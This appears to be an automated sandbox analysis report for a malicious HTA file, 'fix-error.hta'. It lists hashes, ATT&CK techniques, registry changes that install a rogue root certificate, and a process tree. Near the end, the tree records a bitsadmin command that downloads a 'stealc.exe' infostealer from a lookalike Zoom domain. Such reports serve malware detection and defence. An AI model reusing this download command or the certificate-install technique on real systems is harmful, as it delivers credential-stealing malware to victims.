92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138

General

Target

fix-error.hta
Size

74KB
MD5

acfba6ff2e80e0ebc80df9e7d326337c
SHA1

fe28d5756815fdac31a744a2f11c075f5b1892bc
SHA256

92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138
SHA512

2dcea669b4b3135bca6eba88542948188e25fb040db0a83bac03957b1fd59037998e7bb4a38774115ca051f07cbeacf99fd95113321e6c8fae4568a2e4e30f00
SSDEEP

768:BfaGWSO85ALmEcHUfkJ7Bate4LV1VZ6Y3PaNNHpXKMcpgUj:gGZALNcH77BajLbf61NR1pcbj

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2404	mshta.exe
9	2404	mshta.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
2716	bitsadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2992	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
756	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C032B28543574D9D91A762ED9961AAC40414312D\Blob = 0400000001000000100000006da639220bdfdc90a9f7be4e61f8cd190f0000000100000020000000cb85a0dde968b349615a0bb0cda213b3302808f13b2c9b68f62f2e8c10a1e1a6030000000100000014000000c032b28543574d9d91a762ed9961aac40414312d14000000010000001400000065fc171b65c0ef44ca23f219737a1b6ab2e70d9d2000000001000000f9020000308202f5308201dda003020102021036374312c29deb565384ab7908dd9a46300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3235303131333139303030305a170d3330303131333139303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100d01064e34a81f234f1ca7fbe1c7f60ed08f2f592292b96765ce1cab88008408273264b56a7fdb01b19c35747ab2cee99e5c639b84229a32aba2b545d01031298055240ab9b1c3fc86e1dfae9cdb66f31121c7bda417ee5dae59fce57630510cbdbdfa6538a6cd7fa4864ac3431aff4d9a7d48a529c9d4466b0b494eb0cdb7720228eba2585a76b92c8535283ed04dba79374f3e90d00e3c7b21d0689589f760db5b3e977ac640cfc652a689e6021c02eb3de7f9991d538d54d5b9d0b7c567a1cffb7a0cd221572a7fabb7489916c811aec613eb80dcbe6f9f827ec5080e4ced20a7ab7111d72c5bfbef026f08198cda5c738b33b8d2450b9b5613ba1b7d1efe30203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e0416041465fc171b65c0ef44ca23f219737a1b6ab2e70d9d300d06092a864886f70d01010b0500038201010032ccdd804d8c01733cbcc2abb2948b57cdb4b60c733c1cb08e69b1fdac273a0fc80e4d3cf84a44efeb9cb8570a81fdf96c27c23e805396021f073a8ca602ac297cf91090d608b660cf4a9f8ec68474dfcdd446c17c55ddb383f74d1d880d834852c67f7f5808dbfebc3c8304d2fe9e6cfa6e5b2309ad23428a6688c5de5b3175c073745ec78f2259e46f51e802eb287971d22fe2c66672c741af998916aa08ff08d1bb46c513ea4f250d040a2271df053a04a0bb240a3e2921552870e2810968291ec2640d7475dd553e48f155f2c0d1dbd3e66982e2a47b2cbec7bf60762da4cdce9c936d1a6f1b1f0dce85ef0db499f4f0cc7480ebe6cdc7de1ed002c327b5	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C032B28543574D9D91A762ED9961AAC40414312D\Blob = 190000000100000010000000687b05bb62faf860d4d73aba2abeed5214000000010000001400000065fc171b65c0ef44ca23f219737a1b6ab2e70d9d030000000100000014000000c032b28543574d9d91a762ed9961aac40414312d0f0000000100000020000000cb85a0dde968b349615a0bb0cda213b3302808f13b2c9b68f62f2e8c10a1e1a60400000001000000100000006da639220bdfdc90a9f7be4e61f8cd192000000001000000f9020000308202f5308201dda003020102021036374312c29deb565384ab7908dd9a46300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3235303131333139303030305a170d3330303131333139303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100d01064e34a81f234f1ca7fbe1c7f60ed08f2f592292b96765ce1cab88008408273264b56a7fdb01b19c35747ab2cee99e5c639b84229a32aba2b545d01031298055240ab9b1c3fc86e1dfae9cdb66f31121c7bda417ee5dae59fce57630510cbdbdfa6538a6cd7fa4864ac3431aff4d9a7d48a529c9d4466b0b494eb0cdb7720228eba2585a76b92c8535283ed04dba79374f3e90d00e3c7b21d0689589f760db5b3e977ac640cfc652a689e6021c02eb3de7f9991d538d54d5b9d0b7c567a1cffb7a0cd221572a7fabb7489916c811aec613eb80dcbe6f9f827ec5080e4ced20a7ab7111d72c5bfbef026f08198cda5c738b33b8d2450b9b5613ba1b7d1efe30203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e0416041465fc171b65c0ef44ca23f219737a1b6ab2e70d9d300d06092a864886f70d01010b0500038201010032ccdd804d8c01733cbcc2abb2948b57cdb4b60c733c1cb08e69b1fdac273a0fc80e4d3cf84a44efeb9cb8570a81fdf96c27c23e805396021f073a8ca602ac297cf91090d608b660cf4a9f8ec68474dfcdd446c17c55ddb383f74d1d880d834852c67f7f5808dbfebc3c8304d2fe9e6cfa6e5b2309ad23428a6688c5de5b3175c073745ec78f2259e46f51e802eb287971d22fe2c66672c741af998916aa08ff08d1bb46c513ea4f250d040a2271df053a04a0bb240a3e2921552870e2810968291ec2640d7475dd553e48f155f2c0d1dbd3e66982e2a47b2cbec7bf60762da4cdce9c936d1a6f1b1f0dce85ef0db499f4f0cc7480ebe6cdc7de1ed002c327b5	mshta.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C032B28543574D9D91A762ED9961AAC40414312D	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C032B28543574D9D91A762ED9961AAC40414312D\Blob = 0f0000000100000020000000cb85a0dde968b349615a0bb0cda213b3302808f13b2c9b68f62f2e8c10a1e1a6030000000100000014000000c032b28543574d9d91a762ed9961aac40414312d2000000001000000f9020000308202f5308201dda003020102021036374312c29deb565384ab7908dd9a46300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3235303131333139303030305a170d3330303131333139303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100d01064e34a81f234f1ca7fbe1c7f60ed08f2f592292b96765ce1cab88008408273264b56a7fdb01b19c35747ab2cee99e5c639b84229a32aba2b545d01031298055240ab9b1c3fc86e1dfae9cdb66f31121c7bda417ee5dae59fce57630510cbdbdfa6538a6cd7fa4864ac3431aff4d9a7d48a529c9d4466b0b494eb0cdb7720228eba2585a76b92c8535283ed04dba79374f3e90d00e3c7b21d0689589f760db5b3e977ac640cfc652a689e6021c02eb3de7f9991d538d54d5b9d0b7c567a1cffb7a0cd221572a7fabb7489916c811aec613eb80dcbe6f9f827ec5080e4ced20a7ab7111d72c5bfbef026f08198cda5c738b33b8d2450b9b5613ba1b7d1efe30203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e0416041465fc171b65c0ef44ca23f219737a1b6ab2e70d9d300d06092a864886f70d01010b0500038201010032ccdd804d8c01733cbcc2abb2948b57cdb4b60c733c1cb08e69b1fdac273a0fc80e4d3cf84a44efeb9cb8570a81fdf96c27c23e805396021f073a8ca602ac297cf91090d608b660cf4a9f8ec68474dfcdd446c17c55ddb383f74d1d880d834852c67f7f5808dbfebc3c8304d2fe9e6cfa6e5b2309ad23428a6688c5de5b3175c073745ec78f2259e46f51e802eb287971d22fe2c66672c741af998916aa08ff08d1bb46c513ea4f250d040a2271df053a04a0bb240a3e2921552870e2810968291ec2640d7475dd553e48f155f2c0d1dbd3e66982e2a47b2cbec7bf60762da4cdce9c936d1a6f1b1f0dce85ef0db499f4f0cc7480ebe6cdc7de1ed002c327b5	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\C032B28543574D9D91A762ED9961AAC40414312D\Blob = 14000000010000001400000065fc171b65c0ef44ca23f219737a1b6ab2e70d9d030000000100000014000000c032b28543574d9d91a762ed9961aac40414312d0f0000000100000020000000cb85a0dde968b349615a0bb0cda213b3302808f13b2c9b68f62f2e8c10a1e1a62000000001000000f9020000308202f5308201dda003020102021036374312c29deb565384ab7908dd9a46300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3235303131333139303030305a170d3330303131333139303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100d01064e34a81f234f1ca7fbe1c7f60ed08f2f592292b96765ce1cab88008408273264b56a7fdb01b19c35747ab2cee99e5c639b84229a32aba2b545d01031298055240ab9b1c3fc86e1dfae9cdb66f31121c7bda417ee5dae59fce57630510cbdbdfa6538a6cd7fa4864ac3431aff4d9a7d48a529c9d4466b0b494eb0cdb7720228eba2585a76b92c8535283ed04dba79374f3e90d00e3c7b21d0689589f760db5b3e977ac640cfc652a689e6021c02eb3de7f9991d538d54d5b9d0b7c567a1cffb7a0cd221572a7fabb7489916c811aec613eb80dcbe6f9f827ec5080e4ced20a7ab7111d72c5bfbef026f08198cda5c738b33b8d2450b9b5613ba1b7d1efe30203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e0416041465fc171b65c0ef44ca23f219737a1b6ab2e70d9d300d06092a864886f70d01010b0500038201010032ccdd804d8c01733cbcc2abb2948b57cdb4b60c733c1cb08e69b1fdac273a0fc80e4d3cf84a44efeb9cb8570a81fdf96c27c23e805396021f073a8ca602ac297cf91090d608b660cf4a9f8ec68474dfcdd446c17c55ddb383f74d1d880d834852c67f7f5808dbfebc3c8304d2fe9e6cfa6e5b2309ad23428a6688c5de5b3175c073745ec78f2259e46f51e802eb287971d22fe2c66672c741af998916aa08ff08d1bb46c513ea4f250d040a2271df053a04a0bb240a3e2921552870e2810968291ec2640d7475dd553e48f155f2c0d1dbd3e66982e2a47b2cbec7bf60762da4cdce9c936d1a6f1b1f0dce85ef0db499f4f0cc7480ebe6cdc7de1ed002c327b5	mshta.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	9	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	756	taskkill.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2404 wrote to memory of 2892	2404	mshta.exe	32
PID 2404 wrote to memory of 2892	2404	mshta.exe	32
PID 2404 wrote to memory of 2892	2404	mshta.exe	32
PID 2404 wrote to memory of 2892	2404	mshta.exe	32
PID 2404 wrote to memory of 2716	2404	mshta.exe	34
PID 2404 wrote to memory of 2716	2404	mshta.exe	34
PID 2404 wrote to memory of 2716	2404	mshta.exe	34
PID 2404 wrote to memory of 2716	2404	mshta.exe	34
PID 2892 wrote to memory of 2992	2892	cmd.exe	36
PID 2892 wrote to memory of 2992	2892	cmd.exe	36
PID 2892 wrote to memory of 2992	2892	cmd.exe	36
PID 2892 wrote to memory of 2992	2892	cmd.exe	36
PID 2892 wrote to memory of 756	2892	cmd.exe	38
PID 2892 wrote to memory of 756	2892	cmd.exe	38
PID 2892 wrote to memory of 756	2892	cmd.exe	38
PID 2892 wrote to memory of 756	2892	cmd.exe	38

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\fix-error.hta"
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2404
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout /t 30 /nobreak > nul && taskkill /F /PID 2404
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2892
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 30 /nobreak
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:2992
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /PID 2404
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:756
- C:\Windows\SysWOW64\bitsadmin.exe
  "C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority foreground https://us18web-zoom.us/stealc.exe C:\Users\Admin\AppData\Local\Temp\stealc.exe
  2⤵
  - Download via BitsAdmin
  - System Location Discovery: System Language Discovery
  PID:2716